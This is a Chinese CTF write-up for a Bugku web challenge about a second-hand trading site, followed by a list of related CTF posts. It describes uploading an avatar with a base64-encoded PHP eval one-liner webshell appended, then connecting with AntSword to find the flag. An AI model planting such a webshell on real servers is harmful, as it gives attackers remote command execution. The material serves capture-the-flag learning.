xxx二手交易市场

打开看见是一个网站 所以从零开始测试
1.首先点开一个商品 往下滑有回复框 但是要先注册 所以等注册了再来测试
2.搜索栏也不能用 暂时放过,不过在二手界面发现了一个搜索框 输入一般的sql查询发现好像过滤了# ‘’“”等
3.求购 公告栏也没什么可以利用的
4.发现登录注册框 先爆破一下,不过有验证码爆破不行还要识别验证码,先放放
5.先注册一个账号
看了一下功能,先上个商品看看?

额 要管理员验证 走不通
邮箱签名那块也是有输入验证
再去看看回复框
好像没什么用

再翻了翻 还有上传头像可以用 打开burpsuite
随便传一个 发现用了base64 先解码看看
发现前面不对劲 有%好像是unicode,所以先丢进unicode

参考链接:https://www.cnblogs.com/wsh-ning/p/7463101.html1.形如:"data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/sABFEdWNreQABAAQAAAA......==" 的字符串就是base64。2.data:image/jpeg;base64,为头部信息,其余为图片编码。3.使用base64_decode对编码内容进行解码。4. 编码后的数据比原始数据略长,为原来的4/3。因为:三个字节有24个位元,就可以刚好对应于4个Base64单元,即3个字节需要用4个Base64的可打印字符来表示。

所以在后面把图片加一句话码并且要base64编码


用蚁剑连一下 发现返回数据为空???
研究了许久后发现 tnnd base64网站编译出错了
用下面这个base64就能过

<?php @eval($_POST['cmd']);?>PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

用这个就过不了

JTNDJTNGcGhwJTIwQGV2YWwlMjglMjRfUE9TVCU1QiUyN2NtZCUyNyU1RCUyOSUzQiUzRiUzRQ==

过了之后用蚁剑连接 然后用find命令直接找
找到flag

Bugku CTF 每日一题 xxx二手交易市场相关推荐

  1. Bugku CTF每日一题 可爱的故事

    可爱的故事 这题给我整无语了 建议放到crypto分区 一段看不懂的文字 用winhex等也找不到有效线索 研究了半天无奈看了下评论 发现是某原的一种文字 (流汗黄豆)只能说不好评价哈 根据提示·找对 ...

  2. Bugku CTF 每日一题 where is flag

    where is flag 番外篇 解压得到两个压缩包 第一个压缩包key可以解压 第二个压缩包出师表要密码才能解压 打开第一个压缩包解压发现出师表中有些残缺,比如 先帝创业未办AAAAA 而且下一段 ...

  3. Bugku CTF每日一题 乌云邀请码

    乌云邀请码 打开发现是张图片,用winhex打开发现很多和普通图片不一样的地方 打开属性没发现什么异常 但是在STEGSLOVE打开却发现了异常,RGB都在0位有如下图的异常 于是考虑RGB隐写,但是 ...

  4. Bugku CTF 每日一题 爆照

    爆照 打开是个jpg文件,winhex打开,在最后发现了异常,应该是有压缩包 用binwalk分析一下,发现压缩包,可以用dd命令或者foremost分离 dd if=file.jpg of=11.z ...

  5. Bugku CTF 每日一题 三色绘恋

    三色绘恋 打开是一个压缩包 发现需要密码 用winhex打开后发现有个0900 所以应该是伪加密 09改为00 打开压缩包发现是一张图片 用winhex打开 有异样 猜测是藏了东西 用linux 下的 ...

  6. Bugku CTF 每日一题 富强民主等

    富强民主 一看题目 就知道是核心价值观密码 随便找个网站解码得到就行,随便提供一个吧 http://www.hiencode.com/cvencode.html 多种方法解决 点开发现是个exe 点不 ...

  7. [CTF] 每日一题汇总

    [CTF] 每日一题汇总 WEB 编号 题目 知识点 No.0001 博兹瓦纳-爆破 zip伪加密.CRC校验 No.0002 莫桑比克-php是最好的语言 php伪协议.data协议 No.0003 ...

  8. Bugku CTF 密码学刷题

    Bugku CTF 密码学刷题 前言 一.抄错的字符 二./.- 三.聪明的小羊 四.ok 五.[+-<>] 六.把猪困在猪圈里 七.你喜欢下棋吗 八.小山丘的秘密 九.EN-气泡 十.你 ...

  9. CTF每日一题之ACII码编码

    好久没写了...因为好久没做题了,最近又开始偷懒了,愁人.今天发现了一个新的CTF平台,很有意思,不过缺点是没有中文,不过这没有关系,谁叫我谷歌翻译用的贼6,今天是个签到题,就不多说了. 题目链接:h ...

  10. BugKu CTF 社工题部分writeup

    1.密码 姓名:张三 生日:19970315 就是猜密码吧 zs19970315 2.信息查找 社会工程学基础题目 信息查找 听说bugku.cn 在今日头条上能找到?? 提示:flag为群号码 百度 ...

最新文章

  1. AI已来,更有未来!科大讯飞全球1024开发者节,这场AI盛会你也可以云参与
  2. 实模式与保护模式详解二:地址映射
  3. 计算机游戏的作文,玩电脑游戏作文
  4. 过度封装的ZeroMQ
  5. 《JavaScript 高级程序设计》笔记 第7章及以后
  6. Perl的浅拷贝和深度拷贝
  7. Java中从String到Long的转换
  8. 云计算时代下的数据中心运维之路
  9. 开机时不输入用户名密码直接登录
  10. 多线程依次接收信息并发送
  11. centos 最小化安装 补充命令_CentOS7安装后没网络的解决方法
  12. pdf文档有时打开乱码的解决方案
  13. c语言编程秒表multisim,用定时器计数器设计一个简单的秒表.docx
  14. 制造行业IT运维管理解决方案
  15. DataLoader 和 Dataset
  16. jmeter快速修改协议、服务器名称或IP、端口号的方法
  17. PLC编程语言汇总,留言告诉我你会哪一个?
  18. opencv入门系列教学(五)图像的基本操作(像素值、属性、ROI和边框)
  19. Andriod界面设计的分辨率和尺寸适配全攻略 转载
  20. vue 修改模板{{}}标签_vue.js - Vue单文件的template标签

热门文章

  1. 什么成就了今天的硅谷?
  2. 高项 真题 问题归纳
  3. Docker部署ES集群(图文并茂)
  4. SAP-MM-发票校验基本功能详解
  5. 升级Nexus 出现小绿人倒地+无命令(no command)解决方案
  6. [去哪儿]裁减网格纸
  7. depot_tools/.cipd_bin/vpython3: No such file or directory chromium 编译问题
  8. MIMO-OFDM1.1无线信道python
  9. SPI,SPI_DMA,FSMC配置流程
  10. ctfshow网络迷踪窗外风景wp